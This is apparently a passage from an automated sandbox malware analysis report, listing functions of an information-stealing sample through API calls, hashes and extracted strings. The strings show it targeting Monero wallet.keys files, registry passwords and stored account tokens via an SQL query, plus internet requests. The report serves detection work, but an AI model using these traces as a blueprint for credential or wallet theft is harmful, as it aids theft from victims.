                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: e756b9e9831fa58f3de83f9a717a5693f33292bf24bffe9ff7440bdd7313bd5f
                        • Instruction ID: d8a3881a1117af263a745c1a3271d586d52758196d37101a12ec48f34abf70ef
                        • Opcode Fuzzy Hash: e756b9e9831fa58f3de83f9a717a5693f33292bf24bffe9ff7440bdd7313bd5f
                        • Instruction Fuzzy Hash: 957136B6910208ABDB54FBB0DC89FEE7779AB88300F048598F60997181DB34DB65CF91
                        Function 00261310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002612B4
                          • Part of subcall function 002612A0: RtlAllocateHeap.NTDLL(00000000), ref: 002612BB
                          • Part of subcall function 002612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002612D7
                          • Part of subcall function 002612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002612F5
                          • Part of subcall function 002612A0: RegCloseKey.ADVAPI32(?), ref: 002612FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0026134F
                        • lstrlen.KERNEL32(?), ref: 0026135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00261377
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00261465
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 002614EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: e660309f0a34ffe88488f41217bb42db767a7659b8b7643a3f60e4c0fb46a390
                        • Instruction ID: 4947e30857f85cf634c72f490152df0e964665f90dae4c88f90526d007b02a77
                        • Opcode Fuzzy Hash: e660309f0a34ffe88488f41217bb42db767a7659b8b7643a3f60e4c0fb46a390
                        • Instruction Fuzzy Hash: 215125B1D6011997CB55FB60DD92FEE733C9B54310F4041A8B60E62091EF706BA9CFA6
                        Function 002675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002672D0: memset.MSVCRT ref: 00267314
                          • Part of subcall function 002672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0026733A
                          • Part of subcall function 002672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002673B1
                          • Part of subcall function 002672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0026740D
                          • Part of subcall function 002672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00267452
                          • Part of subcall function 002672D0: HeapFree.KERNEL32(00000000), ref: 00267459
                        • lstrcat.KERNEL32(00000000,002817FC), ref: 00267606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00267648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0026765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0026768F
                        • lstrcat.KERNEL32(00000000,00281804), ref: 002676A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 002676D3
                        • lstrcat.KERNEL32(00000000,00281808), ref: 002676ED
                        • task.LIBCPMTD ref: 002676FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 2f2d4dd34dfa045a28c5317549d6098ab9a569669b3c27926479033cf7f63374
                        • Instruction ID: 467d47747d491866b9906774f6d3a2fa2fef1091184902207ac117b82f4f4df8
                        • Opcode Fuzzy Hash: 2f2d4dd34dfa045a28c5317549d6098ab9a569669b3c27926479033cf7f63374
                        • Instruction Fuzzy Hash: 7B317EB1920109DFCB08FBB4DC95DFE7B79BB46301B184128F102A7290DB34A9A2CF56
                        Function 002672D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 00267314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0026733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002673B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0026740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00267452
                        • HeapFree.KERNEL32(00000000), ref: 00267459
                        • task.LIBCPMTD ref: 00267555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: 95ab31869af982055b0fd76e7a1230d4cd9312d9fdee793188482a122bb1bad2
                        • Instruction ID: 4186c0fd0bcf0529f1c55350080c79e534f20bf3cc5d88bcfa75d09e4671523e
                        • Opcode Fuzzy Hash: 95ab31869af982055b0fd76e7a1230d4cd9312d9fdee793188482a122bb1bad2
                        • Instruction Fuzzy Hash: FD616CB58241289BDB24DF50DC55BDAB7B8BF44304F0081E9E689A6181DFB05FD9CFA0
                        Function 002740B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 002740D5
                        • RegOpenKeyExA.ADVAPI32(80000001,00E2DB30,00000000,00020119,?), ref: 002740F4
                        • RegQueryValueExA.ADVAPI32(?,00E2E400,00000000,00000000,00000000,000000FF), ref: 00274118
                        • RegCloseKey.ADVAPI32(?), ref: 00274122
                        • lstrcat.KERNEL32(?,00000000), ref: 00274147
                        • lstrcat.KERNEL32(?,00E2E3D0), ref: 0027415B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID: H$`
                        • API String ID: 2623679115-2340876159
                        • Opcode ID: 0ea1e9503e3839d26363faac9a9586cf9770eb5766a27d8ff477e233f67b5a6c
                        • Instruction ID: 6f5baab739ba7292ebb16de08f183f98cf74054afd9e129edd0f8dba6551aee7
                        • Opcode Fuzzy Hash: 0ea1e9503e3839d26363faac9a9586cf9770eb5766a27d8ff477e233f67b5a6c
                        • Instruction Fuzzy Hash: 7B41DBB6D101086BDB14FBB0DC46FFE773DAB88300F448958B61A56181EB755BA8CF92
                        Function 00278100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E2E1A8,00000000,?,00280E2C,00000000,?,00000000), ref: 00278130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00278137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00278158
                        • __aulldiv.LIBCMT ref: 00278172
                        • __aulldiv.LIBCMT ref: 00278180
                        • wsprintfA.USER32 ref: 002781AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: eeafde79b777ad907ae25aecc822df510fe5782ffad60eec11f10a5937bf89b0
                        • Instruction ID: e7161f2cc38f5a3da18c565a74d43238e3783a3fd84f3e1944ab9179b9382341
                        • Opcode Fuzzy Hash: eeafde79b777ad907ae25aecc822df510fe5782ffad60eec11f10a5937bf89b0
                        • Instruction Fuzzy Hash: 1E2121B1D54218ABDB00DFD4CC49FAFBB78FB45B14F108519F609BB280D77859118BA5
                        Function 00277690 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002776A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 002776AB
                        • RegOpenKeyExA.ADVAPI32(80000002,00E1C350,00000000,00020119,00000000), ref: 002776DD
                        • RegQueryValueExA.ADVAPI32(00000000,00E2E178,00000000,00000000,?,000000FF), ref: 002776FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00277708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11$x
                        • API String ID: 3225020163-3944839559
                        • Opcode ID: 7e1388da3682dd511c334bfe86338c0a606b86e23451eb7498d38a7ef314748d
                        • Instruction ID: 9844727ef96c7efbfca6eb665d90eacac85a8c4b13f44c8878353070e98760ad
                        • Opcode Fuzzy Hash: 7e1388da3682dd511c334bfe86338c0a606b86e23451eb7498d38a7ef314748d
                        • Instruction Fuzzy Hash: 8F014FB9A14205BBDB00EBE4DC49FAEBBB8EB49701F108468FA0597290D7B49924CB55
                        Function 0026BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        • lstrlen.KERNEL32(00000000), ref: 0026BC9F
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0026BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0026BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0026BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: a8209f671da9a1e04e9c5764ce1d11990e2376d7d960d93b7ad1450f77fee63e
                        • Instruction ID: 00d82397872f6890526a308d6eb7a02de114811a785c9a67a21cabad17835cad
                        • Opcode Fuzzy Hash: a8209f671da9a1e04e9c5764ce1d11990e2376d7d960d93b7ad1450f77fee63e
                        • Instruction Fuzzy Hash: AAB111759201089BDB04FBA0DD96EEE773CAF94310F408169F50AA6091EF346A79CF66
                        Function 00276770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 573f6a0bf034f18c6d6fbbf07efc1df3e2b67b50ceb72b0d44333c2857b27f16
                        • Instruction ID: 0b6f542729bb30fa34110254db9831101ee4316901ed07a00c9b6be3e873f5db
                        • Opcode Fuzzy Hash: 573f6a0bf034f18c6d6fbbf07efc1df3e2b67b50ceb72b0d44333c2857b27f16
                        • Instruction Fuzzy Hash: 04F01734904209EFD384AFE1E909B6DBA70FB06702F0401A8E609862D0D7748E61DB9A
                        Function 00264FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00264FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00264FD1
                        • InternetOpenA.WININET(00280DDF,00000000,00000000,00000000,00000000), ref: 00264FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00265011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00265041
                        • InternetCloseHandle.WININET(?), ref: 002650B9
                        • InternetCloseHandle.WININET(?), ref: 002650C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
